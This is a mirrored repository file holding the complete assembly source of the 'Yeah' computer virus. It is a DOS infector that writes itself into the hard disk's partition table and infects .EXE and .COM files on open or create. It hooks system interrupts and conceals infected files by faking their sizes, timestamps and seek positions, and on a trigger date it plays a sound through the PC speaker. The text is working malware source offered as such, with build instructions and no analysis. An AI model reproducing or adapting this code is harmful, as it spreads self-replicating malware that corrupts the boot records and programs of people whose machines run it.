mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-11 21:05:28 +00:00
1051 lines
35 KiB
NASM
1051 lines
35 KiB
NASM
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Virus Name: Yeah
|
|||
|
; Origin: Holland
|
|||
|
; Eff Length: 4,096 bytes
|
|||
|
; Type Code: PRhE - Parasitic Resident .EXE & partition table infector
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; This program is assembled with TASM V1.01 from Borland International
|
|||
|
; (assembing with MASM V5.10 from Microsoft Inc. is also possible).
|
|||
|
;
|
|||
|
; TASM stealth;
|
|||
|
; LINK stealth,,stealth;
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Interrupt vectors
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
iseg segment at 0
|
|||
|
org 8*4
|
|||
|
Int8o dw 0 ; interrupt vector 21h
|
|||
|
Int8s dw 0
|
|||
|
|
|||
|
org 1ch*4
|
|||
|
Int1Co dw 0 ; interrupt vector 21h
|
|||
|
Int1Cs dw 0
|
|||
|
|
|||
|
org 21h*4
|
|||
|
Int21o dw 0 ; interrupt vector 21h
|
|||
|
Int21s dw 0
|
|||
|
|
|||
|
iseg ends
|
|||
|
|
|||
|
cseg segment public 'code'
|
|||
|
assume cs:cseg,ds:cseg,es:cseg
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Header of EXE-file
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
VirusSize equ 10d0h ; size of virus
|
|||
|
PrgSize equ 72h ; size of prg after the virus
|
|||
|
|
|||
|
Signature dw 0 ; signature 'MZ'
|
|||
|
PartPage dw 0 ; size of partitial page
|
|||
|
PageCount dw 0 ; number of pages
|
|||
|
ReloCount dw 0 ; number of relocation items
|
|||
|
HeaderSize dw 0 ; size of header
|
|||
|
MinMem dw 0 ; minimum memory needed
|
|||
|
MaxMem dw 0 ; maximum memory needed
|
|||
|
ExeSS dw 0 ; initial SS
|
|||
|
ExeSP dw 0 ; initial SP
|
|||
|
CheckSum dw 0 ; unused ???
|
|||
|
ExeIP dw 0 ; initial IP
|
|||
|
ExeCS dw 0 ; initial CS
|
|||
|
ReloOffset dw 0 ; offset of relocationtable
|
|||
|
OverlayNr dw 0 ; number of overlay
|
|||
|
|
|||
|
ComSize dw -1 ; Size of com-file (-1 for exe)
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; This procedure is called when starting from an exe-file
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
Main: pushf ; save flags
|
|||
|
sub sp,4 ; reserve space far cs:ip
|
|||
|
push ax ; save other registers
|
|||
|
push ds
|
|||
|
push es
|
|||
|
sti ; enable interrupts
|
|||
|
cmp cs:ComSize,-1 ; com or exe-file
|
|||
|
je ExeFile ; -1 : exe-file
|
|||
|
ComFile: mov word ptr ds:[6],0fef0h ; set availeble memory to max
|
|||
|
mov bp,sp ; set cs:ip on stack for
|
|||
|
mov word ptr [bp+8],ds ; returning to the orginal
|
|||
|
mov word ptr [bp+6],100h ; program
|
|||
|
mov bp,ds ; bp : stacksegment
|
|||
|
mov ax,cs ; bx : begin of com-file
|
|||
|
add ax,(VirusSize/10h)
|
|||
|
mov bx,ax
|
|||
|
mov cx,0ff0h ; cx : size of data to move
|
|||
|
add ax,cx ; es : buffer for mover and
|
|||
|
mov es,ax ; infecting the bootsect.
|
|||
|
push cs ; ds : codesegment
|
|||
|
pop ds
|
|||
|
jmp short InfectBoot ; infect bootsector
|
|||
|
ExeFile: mov dx,cs ; Relocation
|
|||
|
add dx,(VirusSize/10h)
|
|||
|
mov ds,dx
|
|||
|
mov cx,ReloCount ; number of relocation items
|
|||
|
add dx,HeaderSize ; size of exe-header
|
|||
|
mov si,ReloOffset ; offset of 1st relocation item
|
|||
|
jcxz NoRelo
|
|||
|
NextRelo: lodsw ; offset
|
|||
|
mov di,ax
|
|||
|
lodsw ; segment
|
|||
|
add ax,dx
|
|||
|
mov es,ax
|
|||
|
mov ax,cs ; relocation factor
|
|||
|
add es:[di],ax
|
|||
|
loop NextRelo ; next relocation item
|
|||
|
NoRelo: mov bp,sp
|
|||
|
mov ax,cs ; set cs:ip on stack for
|
|||
|
add ax,ExeCS ; returning to the orginal
|
|||
|
mov [bp+8],ax ; program
|
|||
|
mov ax,ExeIP
|
|||
|
mov [bp+6],ax
|
|||
|
mov bp,cs ; bp : stacksegment
|
|||
|
add bp,ExeSS
|
|||
|
mov ax,PageCount ; calculate size of exe-file
|
|||
|
mov dx,PartPage ; in paragraphs
|
|||
|
add dx,-1
|
|||
|
sbb ax,0
|
|||
|
mov cl,4
|
|||
|
shr dx,cl
|
|||
|
inc dx
|
|||
|
inc cl
|
|||
|
shl ax,cl
|
|||
|
add dx,ax
|
|||
|
add dx,MinMem ; dx : size of exe-file
|
|||
|
mov cx,dx ; cx : size of code and data
|
|||
|
sub cx,HeaderSize
|
|||
|
mov bx,cs ; bx : start of code and data
|
|||
|
mov ds,bx
|
|||
|
add bx,(VirusSize/10h)
|
|||
|
add bx,dx
|
|||
|
mov es,bx ; es : buffer for mover and
|
|||
|
sub bx,cx ; infecting the bootsect.
|
|||
|
InfectBoot: push bx ; save bx and cx
|
|||
|
push cx
|
|||
|
mov ax,201h ; read bootsector from disk
|
|||
|
xor bx,bx
|
|||
|
mov cx,1
|
|||
|
mov dx,80h
|
|||
|
int 13h
|
|||
|
jc BootOk ; error ?
|
|||
|
mov si,offset BootSector ; compare with infected code
|
|||
|
xor di,di
|
|||
|
mov cx,1*BootSize
|
|||
|
cld
|
|||
|
repe cmpsb
|
|||
|
je BootOk ; equal ?
|
|||
|
mov di,1beh+8 ; check partitions, we don't
|
|||
|
mov cx,4 ; want to overwrite them
|
|||
|
NextPartition: cmp word ptr es:[di+2],0
|
|||
|
ja SectOk
|
|||
|
cmp word ptr es:[di],(VirusSize+1ffh)/200h+1
|
|||
|
ja SectOk
|
|||
|
cmp word ptr es:[di],0
|
|||
|
ja BootOk
|
|||
|
SectOk: add di,10h
|
|||
|
loop NextPartition
|
|||
|
mov si,offset BootSector ; exchange code from bootsector
|
|||
|
xor di,di ; with viral code
|
|||
|
mov cx,1*BootSize
|
|||
|
cld
|
|||
|
call Swapsb
|
|||
|
push es ; write virus to disk
|
|||
|
pop ds
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
mov ax,(VirusSize+1ffh)/200h+300h
|
|||
|
mov cx,2
|
|||
|
int 13h
|
|||
|
push ds
|
|||
|
pop es
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
jc BootOk ; error ?
|
|||
|
mov ax,301h ; write bootsector to disk
|
|||
|
mov cx,1
|
|||
|
int 13h
|
|||
|
BootOk: pop cx ; restore bx and cx
|
|||
|
pop bx
|
|||
|
mov dx,cs ; dx = destenation segment
|
|||
|
xor di,di
|
|||
|
push es ; push seg:ofs of mover
|
|||
|
push di
|
|||
|
push cx ; save cx
|
|||
|
mov cx,1*MoverSize
|
|||
|
mov si,offset Mover
|
|||
|
cld ; copy mover-procedure
|
|||
|
rep movsb
|
|||
|
pop cx ; restore cx
|
|||
|
cli ; disable interrupts
|
|||
|
retf ; jump to mover
|
|||
|
|
|||
|
Mover: mov ax,cx ; save cx
|
|||
|
mov ds,bx ; ds:si = source
|
|||
|
mov es,dx ; es:di = destenation
|
|||
|
xor si,si
|
|||
|
xor di,di
|
|||
|
mov cx,8h ; copy one paragraph
|
|||
|
rep movsw
|
|||
|
inc bx
|
|||
|
inc dx
|
|||
|
mov cx,ax ; restore cx
|
|||
|
loop Mover ; next paragraph
|
|||
|
mov ss,bp ; ss = new stacksegment
|
|||
|
sti ; enable interrupts
|
|||
|
pop es ; restore registers
|
|||
|
pop ds
|
|||
|
pop ax
|
|||
|
iret ; jump to program
|
|||
|
|
|||
|
MoverSize equ ($-Mover)
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Bootsector startup
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
Bootsector: cli ; disable interrupts
|
|||
|
xor bx,bx ; setup stack and ds
|
|||
|
mov ds,bx
|
|||
|
mov ss,bx
|
|||
|
mov sp,7c00h
|
|||
|
sti ; enable interrupts
|
|||
|
mov ax,ds:[413h] ; get size of base memory
|
|||
|
sub ax,(VirusSize+3ffh)/400h; subtract virussize
|
|||
|
mov ds:[413h],ax ; store new memory size
|
|||
|
mov cl,6 ; calculate segment
|
|||
|
shl ax,cl
|
|||
|
mov es,ax ; load virus in reserved mem
|
|||
|
mov ax,(VirusSize+1ffh)/200h+200h
|
|||
|
mov cx,2
|
|||
|
mov dx,80h
|
|||
|
int 13h
|
|||
|
mov bx,offset StartUp ; bx=offset startup
|
|||
|
push es ; jump to startup (es:bx)
|
|||
|
push bx
|
|||
|
retf
|
|||
|
|
|||
|
BootSize equ ($-Bootsector) ; size of bootsector part
|
|||
|
|
|||
|
StartUp: cli ; disable interrupts
|
|||
|
mov ax,offset Interrupt1C ; hack interrupt 1C
|
|||
|
xchg ax,ds:Int1Co
|
|||
|
mov cs:OldInt1Co,ax
|
|||
|
mov ax,cs
|
|||
|
xchg ax,ds:Int1Cs
|
|||
|
mov cs:OldInt1Cs,ax
|
|||
|
mov cs:OldInt21o,-1
|
|||
|
mov cs:OldInt21s,-1
|
|||
|
mov cs:Count,-1
|
|||
|
sti ; enable interrupts
|
|||
|
push cs ; ds=cs
|
|||
|
pop es
|
|||
|
mov si,7c00h ; di=7c00h (Bootsector)
|
|||
|
mov di,offset BootSector ; si=BootSector
|
|||
|
mov cx,1*BootSize ; bytes to copy
|
|||
|
cld ; copy forward
|
|||
|
call Swapsb ; restore orginal boot
|
|||
|
mov ax,7c00h ; offset bootsector
|
|||
|
push ds ; jump to bootsector
|
|||
|
push ax
|
|||
|
retf
|
|||
|
|
|||
|
Interrupt8: push ax ; save registers
|
|||
|
push si
|
|||
|
push ds
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov si,SampleOffset ; get offset of next bit
|
|||
|
dec byte ptr ds:SampleBit
|
|||
|
test byte ptr ds:SampleBit,7
|
|||
|
jnz OfsOk
|
|||
|
inc si
|
|||
|
cmp si,offset SampleEnd ; end of sample ?
|
|||
|
jb OfsOk ; no, play bit
|
|||
|
mov al,34h ; reset int 8 frequency
|
|||
|
out 43h,al
|
|||
|
xor ax,ax
|
|||
|
out 40h,al
|
|||
|
out 40h,al
|
|||
|
mov ds,ax ; reset int 8 vector
|
|||
|
mov ax,cs:OldInt8o
|
|||
|
mov ds:Int8o,ax
|
|||
|
mov ax,cs:OldInt8s
|
|||
|
mov ds:Int8s,ax
|
|||
|
inc byte ptr cs:SampleFlag ; set sample ready flag
|
|||
|
jmp short ExitInt8 ; end of interrupt
|
|||
|
OfsOk: mov SampleOffset,si ; store offset
|
|||
|
rol byte ptr ds:[si],1 ; next bit
|
|||
|
mov ah,ds:[si] ; get bit value
|
|||
|
and ah,1
|
|||
|
shl ah,1
|
|||
|
in al,61h ; get value of io-port 61h
|
|||
|
and al,0fch ; reset last 2 bits
|
|||
|
or al,ah ; set bit 2 with sample value
|
|||
|
out 61h,al ; write to io-port 61h
|
|||
|
ExitInt8: mov al,20h ; end of interrupt signal
|
|||
|
out 20h,al
|
|||
|
pop ds ; restore registers
|
|||
|
pop si
|
|||
|
pop ax
|
|||
|
iret ; return to program
|
|||
|
|
|||
|
Interrupt1C: push ds ; save registers
|
|||
|
push ax
|
|||
|
push bx
|
|||
|
xor ax,ax ; interrupts vectors
|
|||
|
mov ds,ax
|
|||
|
mov ax,ds:Int21o
|
|||
|
cmp cs:OldInt21o,ax
|
|||
|
jne Changed
|
|||
|
mov ax,ds:Int21s
|
|||
|
cmp cs:OldInt21s,ax
|
|||
|
je Equal
|
|||
|
Changed: mov ax,ds:Int21o
|
|||
|
mov cs:OldInt21o,ax
|
|||
|
mov ax,ds:Int21s
|
|||
|
mov cs:OldInt21s,ax
|
|||
|
mov cs:Count,182
|
|||
|
jmp short NotReady
|
|||
|
Equal: dec cs:Count
|
|||
|
jnz NotReady
|
|||
|
mov ax,cs:OldInt1Co ; restore vector 1C
|
|||
|
mov ds:Int1Co,ax ; (This interrupt)
|
|||
|
mov ax,cs:OldInt1Cs
|
|||
|
mov ds:Int1Cs,ax
|
|||
|
mov ax,offset Interrupt21 ; Hack interrupt 21
|
|||
|
xchg ax,ds:Int21o
|
|||
|
mov cs:OldInt21o,ax
|
|||
|
mov ax,cs
|
|||
|
xchg ax,ds:Int21s
|
|||
|
mov cs:OldInt21s,ax
|
|||
|
mov ax,8
|
|||
|
mov bx,offset Handle
|
|||
|
NextHandle: mov word ptr cs:[bx],0
|
|||
|
inc bx
|
|||
|
inc bx
|
|||
|
dec ax
|
|||
|
jnz NextHandle
|
|||
|
mov byte ptr cs:Active,-1
|
|||
|
NotReady: pop bx
|
|||
|
pop ax ; restore registers
|
|||
|
pop ds
|
|||
|
jmp cs:OldInt1C ; do orginal int 1C
|
|||
|
|
|||
|
Swapsb: mov al,es:[di] ; exchange two memory bytes
|
|||
|
xchg al,ds:[si]
|
|||
|
stosb
|
|||
|
inc si
|
|||
|
loop Swapsb ; next byte
|
|||
|
ret ; return
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Manipilated functions
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
Functions db 11h ; 1
|
|||
|
dw offset FindFCB
|
|||
|
db 12h ; 2
|
|||
|
dw offset FindFCB
|
|||
|
db 30h ; 3
|
|||
|
dw offset DosVersion
|
|||
|
db 3ch ; 4
|
|||
|
dw offset Open
|
|||
|
db 3dh ; 5
|
|||
|
dw offset Open
|
|||
|
db 3eh ; 6
|
|||
|
dw offset Close
|
|||
|
db 42h ; 7
|
|||
|
dw offset Seek
|
|||
|
db 45h ; 8
|
|||
|
dw offset Duplicate
|
|||
|
db 46h ; 9
|
|||
|
dw offset Redirect
|
|||
|
db 4eh ; 10
|
|||
|
dw offset Find
|
|||
|
db 4fh ; 11
|
|||
|
dw offset Find
|
|||
|
db 5bh ; 12
|
|||
|
dw offset Open
|
|||
|
db 6ch ; 13
|
|||
|
dw offset OpenCreate
|
|||
|
|
|||
|
FunctionCount equ 13
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; The orginal interrupt 21h is redirected to this procedure
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
DosVersion: push ax
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push ds
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
cmp cs:Active,0
|
|||
|
je NotActive
|
|||
|
mov ah,2ah
|
|||
|
call DOS
|
|||
|
cmp ActiveYear,cx
|
|||
|
jb NotActive
|
|||
|
cmp ActiveDate,dx
|
|||
|
jb NotActive
|
|||
|
cli
|
|||
|
xor ax,ax
|
|||
|
mov ds,ax
|
|||
|
mov ax,offset Interrupt8
|
|||
|
xchg ax,ds:Int8o
|
|||
|
mov cs:OldInt8o,ax
|
|||
|
mov ax,cs
|
|||
|
xchg ax,ds:Int8s
|
|||
|
mov cs:OldInt8s,ax
|
|||
|
mov al,34h
|
|||
|
out 43h,al
|
|||
|
mov al,80h
|
|||
|
out 40h,al
|
|||
|
mov al,0
|
|||
|
out 40h,al
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov byte ptr SampleFlag,0
|
|||
|
mov byte ptr SampleBit,0
|
|||
|
mov word ptr SampleOffset,offset SampleData
|
|||
|
sti
|
|||
|
Delay: cmp byte ptr SampleFlag,0
|
|||
|
je Delay
|
|||
|
mov byte ptr Active,0
|
|||
|
NotActive: pop ds
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop ax
|
|||
|
jmp Old21
|
|||
|
|
|||
|
FindFCB: call DOS ; call orginal interrupt
|
|||
|
cmp al,0 ; error ?
|
|||
|
jne Ret1
|
|||
|
pushf ; save registers
|
|||
|
push ax
|
|||
|
push bx
|
|||
|
push es
|
|||
|
mov ah,2fh ; get DTA
|
|||
|
call DOS
|
|||
|
cmp byte ptr es:[bx],-1 ; extended fcb ?
|
|||
|
jne FCBOk
|
|||
|
add bx,8 ; yes, skip 8 bytes
|
|||
|
FCBOk: mov al,es:[bx+16h] ; get file-time (low byte)
|
|||
|
and al,1fh ; seconds
|
|||
|
cmp al,1fh ; 62 seconds ?
|
|||
|
jne FileOk ; no, file not infected
|
|||
|
sub word ptr es:[bx+1ch],VirusSize
|
|||
|
sbb word ptr es:[bx+1eh],0 ; adjust file-size
|
|||
|
jmp short Time
|
|||
|
|
|||
|
Find: call DOS ; call orginal interrupt
|
|||
|
jc Ret1 ; error ?
|
|||
|
pushf ; save registers
|
|||
|
push ax
|
|||
|
push bx
|
|||
|
push es
|
|||
|
mov ah,2fh
|
|||
|
call DOS
|
|||
|
mov al,es:[bx+16h] ; get file-time (low byte)
|
|||
|
and al,1fh ; seconds
|
|||
|
cmp al,1fh ; 62 seconds ?
|
|||
|
jne FileOk ; no, file not infected
|
|||
|
sub word ptr es:[bx+1ah],VirusSize
|
|||
|
sbb word ptr es:[bx+1ch],0 ; change file-size
|
|||
|
Time: xor byte ptr es:[bx+16h],1fh; adjust file-time
|
|||
|
FileOk: pop es ; restore registers
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
popf
|
|||
|
Ret1: retf 2 ; return
|
|||
|
|
|||
|
Seek: or bx,bx ; bx=0 ?
|
|||
|
jz Old21 ; yes, do orginal interrupt
|
|||
|
push bx
|
|||
|
call FindHandle
|
|||
|
pop bx
|
|||
|
jc Old21
|
|||
|
Stealth: or al,al ; seek from top of file ?
|
|||
|
jnz Relative ; no, don't change cx:dx
|
|||
|
add dx,VirusSize ; change cx:dx
|
|||
|
adc cx,0
|
|||
|
Relative: call DOS ; Execute orginal int 21h
|
|||
|
jc Ret1 ; Error ?
|
|||
|
sub ax,VirusSize ; adjust dx:ax
|
|||
|
sbb dx,0
|
|||
|
jmp short Ret1 ; return
|
|||
|
|
|||
|
Close: or bx,bx ; bx=0 ?
|
|||
|
je Old21 ; yes, do orginal interrupt
|
|||
|
push ax
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push si
|
|||
|
push ds
|
|||
|
push cs ; ds=cs
|
|||
|
pop ds
|
|||
|
push bx
|
|||
|
call FindHandle
|
|||
|
mov si,bx
|
|||
|
pop bx
|
|||
|
jc NotStealth
|
|||
|
mov word ptr ds:[si],0
|
|||
|
call UpdateHeader
|
|||
|
NotStealth: pop ds ; restore registers
|
|||
|
pop si
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop ax
|
|||
|
Not2: jmp short Old21 ; continue with orginal int
|
|||
|
|
|||
|
Interrupt21: push bx ; after an int 21h instruction
|
|||
|
push cx ; this procedure is started
|
|||
|
mov bx,offset Functions
|
|||
|
mov cx,FunctionCount
|
|||
|
NxtFn: cmp ah,cs:[bx] ; search function
|
|||
|
je FunctionTrap
|
|||
|
add bx,3
|
|||
|
loop NxtFn
|
|||
|
pop cx ; function not found
|
|||
|
pop bx
|
|||
|
Old21: jmp cs:OldInt21
|
|||
|
|
|||
|
FunctionTrap: push bp ; function found, start viral
|
|||
|
mov bp,sp ; version of function
|
|||
|
mov bx,cs:[bx+1]
|
|||
|
xchg bx,[bp+4]
|
|||
|
mov cx,[bp+10]
|
|||
|
xchg cx,[bp+2]
|
|||
|
pop bp
|
|||
|
popf
|
|||
|
ret
|
|||
|
|
|||
|
Duplicate: call DOS
|
|||
|
jc Error
|
|||
|
pushf
|
|||
|
push bx
|
|||
|
call FindHandle
|
|||
|
jc Ret3
|
|||
|
mov bx,ax
|
|||
|
call StoreHandle
|
|||
|
Ret3: pop bx
|
|||
|
popf
|
|||
|
jmp Ret2
|
|||
|
|
|||
|
Redirect: call DOS
|
|||
|
jc Error
|
|||
|
pushf
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
xchg bx,cx
|
|||
|
call FindHandle
|
|||
|
jc Ret4
|
|||
|
mov cs:[bx],cx
|
|||
|
Ret4: pop cx
|
|||
|
pop bx
|
|||
|
popf
|
|||
|
jmp Ret2
|
|||
|
|
|||
|
OpenCreate: or al,al ; extended open/create function
|
|||
|
jne Old21 ; no, do orginal interrupt 21
|
|||
|
push dx ; save dx
|
|||
|
mov dx,si ; check extension of filename
|
|||
|
call CheckName
|
|||
|
pop dx ; retore dx
|
|||
|
jc Old21 ; exe or com-file?
|
|||
|
jmp short ExtensionOk ; yes, infect file or use
|
|||
|
; stealth
|
|||
|
|
|||
|
Open: call CheckName ; exe or com-file ?
|
|||
|
jc Old21 ; no, do orginal int 21
|
|||
|
ExtensionOk: call DOS ; do interrupt 21
|
|||
|
jnc NoError ; error ?
|
|||
|
Error: jmp Ret2 ; yes, return and do nothing
|
|||
|
NoError: pushf ; save registers
|
|||
|
push ax
|
|||
|
push bx
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push ds
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov bx,ax ; bx = file handle
|
|||
|
mov ax,4400h ; get device information
|
|||
|
call DOS
|
|||
|
jc PopRet ; error ?
|
|||
|
test dx,80h ; character device
|
|||
|
jnz PopRet ; yes, return and do nothing
|
|||
|
call EndOfFile ; get file size
|
|||
|
or ax,dx ; 0 ?
|
|||
|
jnz FileExists ; no, file already existed
|
|||
|
FileCreated: call HandleFree
|
|||
|
jc PopRet
|
|||
|
mov ah,2ah
|
|||
|
call DOS
|
|||
|
add dh,3
|
|||
|
cmp dh,12
|
|||
|
jbe DateOk
|
|||
|
inc cx
|
|||
|
sub dh,12
|
|||
|
DateOk: mov ActiveYear,cx
|
|||
|
mov ActiveDate,dx
|
|||
|
mov ah,40h ; write virus to file
|
|||
|
mov cx,VirusSize
|
|||
|
call Zero2
|
|||
|
jc NoVir ; error ? yes, return
|
|||
|
xor ax,cx ; entire virus written ?
|
|||
|
jnz NoVir ; no, return
|
|||
|
call StoreHandle
|
|||
|
jmp short PopRet ; return
|
|||
|
FileExists: call TopOfFile ; go to top of file
|
|||
|
call HandleFree
|
|||
|
jc PopRet ; no, do nothing
|
|||
|
call ReadHeader ; read exe-header
|
|||
|
jc NoVir ; error ?
|
|||
|
xor ax,cx ; entire header read
|
|||
|
jne NoVir ; no, not infected
|
|||
|
cmp Signature,5a4dh ; signature = 'MZ' ?
|
|||
|
jne NoVir ; no, not infected
|
|||
|
cmp HeaderSize,ax ; headersize = 0 ?
|
|||
|
jne NoVir ; no, not infected
|
|||
|
cmp CheckSum,0DEADh ; checksum = DEAD hex
|
|||
|
jne NoVir ; no, not infected
|
|||
|
call StoreHandle
|
|||
|
mov dx,VirusSize ; seek to end of virus
|
|||
|
jmp short Infected
|
|||
|
NoVir: xor dx,dx
|
|||
|
Infected: xor cx,cx ; go to end of virus if file
|
|||
|
mov ax,4200h ; is infected
|
|||
|
call DOS
|
|||
|
PopRet: pop ds ; restore registers
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
popf
|
|||
|
Ret2: retf 2 ; return
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
EndOfFile: mov ax,4202h ; go to end of file
|
|||
|
jmp short Zero1
|
|||
|
|
|||
|
TopOfFile: mov ax,4200h ; go to top of file
|
|||
|
Zero1: xor cx,cx
|
|||
|
jmp short Zero2
|
|||
|
|
|||
|
WriteHeader: mov ah,40h ; write exe-header to file
|
|||
|
jmp short Hdr
|
|||
|
|
|||
|
ReadHeader: mov ah,3fh ; read exe-header from file
|
|||
|
Hdr: mov cx,1eh
|
|||
|
Zero2: xor dx,dx
|
|||
|
|
|||
|
DOS: pushf ; call orginal interrupt
|
|||
|
call cs:OldInt21
|
|||
|
ret
|
|||
|
|
|||
|
FindHandle: push ax
|
|||
|
push cx
|
|||
|
mov ax,bx
|
|||
|
mov bx,offset Handle
|
|||
|
mov cx,8
|
|||
|
NotFound: cmp ax,cs:[bx]
|
|||
|
je Found
|
|||
|
inc bx
|
|||
|
inc bx
|
|||
|
loop NotFound
|
|||
|
stc
|
|||
|
Found: pop cx
|
|||
|
pop ax
|
|||
|
ret
|
|||
|
|
|||
|
HandleFree: push bx
|
|||
|
xor bx,bx
|
|||
|
call FindHandle
|
|||
|
pop bx
|
|||
|
ret
|
|||
|
|
|||
|
StoreHandle: push bx
|
|||
|
push bx
|
|||
|
xor bx,bx
|
|||
|
call FindHandle
|
|||
|
pop cs:[bx]
|
|||
|
pop bx
|
|||
|
ret
|
|||
|
|
|||
|
CheckName: push ax ; check for .exe or .com
|
|||
|
push cx ; save registers
|
|||
|
push si
|
|||
|
push di
|
|||
|
xor ah,ah ; point found = 0
|
|||
|
mov cx,100h ; max length filename = 100h
|
|||
|
mov si,dx ; si = start of filename
|
|||
|
cld
|
|||
|
NxtChr: lodsb ; get byte
|
|||
|
or al,al ; 0 ?
|
|||
|
je EndName ; yes, check extension
|
|||
|
cmp al,'\' ; \ ?
|
|||
|
je Slash ; yes, point found = 0
|
|||
|
cmp al,'.' ; . ?
|
|||
|
je Point ; yes, point found = 1
|
|||
|
loop NxtChr ; next character
|
|||
|
jmp short EndName ; check extension
|
|||
|
Slash: xor ah,ah ; point found = 0
|
|||
|
jmp NxtChr ; next character
|
|||
|
Point: inc ah ; point found = 1
|
|||
|
mov di,si ; di = start of extension
|
|||
|
jmp NxtChr ; next character
|
|||
|
EndName: cmp ah,1 ; point found = 0
|
|||
|
jne NotExe ; yes, not an exe-file
|
|||
|
mov si,di ; si = start of extension
|
|||
|
lodsw ; first 2 characters
|
|||
|
and ax,0dfdfh ; uppercase
|
|||
|
mov cx,ax
|
|||
|
lodsb ; 3rd character
|
|||
|
and al,0dfh ; uppercase
|
|||
|
cmp cx,04f43h ; extension = .com ?
|
|||
|
jne NotCom
|
|||
|
cmp al,04dh
|
|||
|
je ChkRet
|
|||
|
NotCom: cmp cx,05845h ; extension = .exe ?
|
|||
|
jne NotExe
|
|||
|
cmp al,045h
|
|||
|
je ChkRet
|
|||
|
NotExe: stc ; set carry flag
|
|||
|
ChkRet: pop di ; restore registers
|
|||
|
pop si
|
|||
|
pop cx
|
|||
|
pop ax
|
|||
|
ret ; return
|
|||
|
|
|||
|
UpdateHeader: mov ax,4200h ; position read/write pointer
|
|||
|
xor cx,cx ; at the end of the virus
|
|||
|
mov dx,VirusSize
|
|||
|
call DOS
|
|||
|
call ReadHeader ; read orginal exe-header
|
|||
|
cmp Signature,5a4dh
|
|||
|
je InfectExe
|
|||
|
InfectCom: mov Signature,5a4dh
|
|||
|
mov ReloOffset,01ch
|
|||
|
mov OverlayNr,0
|
|||
|
mov ExeSS,(VirusSize-100h)/10h
|
|||
|
mov ExeSP,0fffeh
|
|||
|
call EndOfFile
|
|||
|
sub ax,VirusSize
|
|||
|
sbb dx,0
|
|||
|
mov ComSize,ax
|
|||
|
mov cx,10h
|
|||
|
div cx
|
|||
|
sub dx,1
|
|||
|
mov dx,0ff2h+20h
|
|||
|
sbb dx,ax
|
|||
|
mov MinMem,dx
|
|||
|
jmp WriteIt
|
|||
|
InfectExe: mov ComSize,-1
|
|||
|
mov ax,(VirusSize/10h)
|
|||
|
add ax,HeaderSize
|
|||
|
add ExeSS,ax
|
|||
|
add MinMem,20h
|
|||
|
add MaxMem,20h
|
|||
|
jnc MaxOk
|
|||
|
WriteIt: mov MaxMem,0ffffh
|
|||
|
MaxOk: mov ReloCount,0
|
|||
|
mov HeaderSize,0
|
|||
|
mov CheckSum,0DEADh
|
|||
|
mov ExeCS,0
|
|||
|
mov ExeIP,offset Main
|
|||
|
call EndOfFile
|
|||
|
mov cx,200h
|
|||
|
div cx
|
|||
|
mov PartPage,dx
|
|||
|
add dx,-1
|
|||
|
adc ax,0
|
|||
|
mov PageCount,ax
|
|||
|
call TopOfFile
|
|||
|
call WriteHeader ; write header at the top of
|
|||
|
jc InfErr ; the virus
|
|||
|
mov ax,5700h
|
|||
|
call DOS
|
|||
|
mov ax,5701h
|
|||
|
or cl,1fh
|
|||
|
call DOS
|
|||
|
InfErr: ret
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Data to generate the 123 yeah sound
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
SampleData db 07dh,075h,05fh,0ffh,0ffh,0ffh,0ffh,0a0h,03fh,007h,0f8h,03ch,007h,0e0h,07fh,003h
|
|||
|
db 0c0h,0f8h,00fh,0c0h,0f0h,07ch,00fh,0c0h,0f8h,0f0h,01fh,081h,0ffh,081h,0fch,00ch
|
|||
|
db 07eh,007h,0f0h,071h,0f0h,03fh,007h,00fh,083h,0f0h,071h,0f8h,03fh,007h,01fh,003h
|
|||
|
db 0e0h,0e3h,0e0h,07ch,000h,0fch,00fh,080h,03fh,003h,0e0h,01fh,0c0h,0fch,007h,0f0h
|
|||
|
db 03fh,003h,0f8h,00fh,0c0h,0feh,003h,0f0h,07fh,001h,0f8h,03fh,0c0h,07eh,007h,0fch
|
|||
|
db 03fh,001h,0f8h,01eh,01fh,002h,03eh,00fh,0c0h,03fh,007h,0f0h,01fh,007h,0fch,00fh
|
|||
|
db 082h,0ffh,00fh,086h,00fh,038h,03eh,004h,03ch,01fh,008h,03eh,01fh,008h,03eh,00fh
|
|||
|
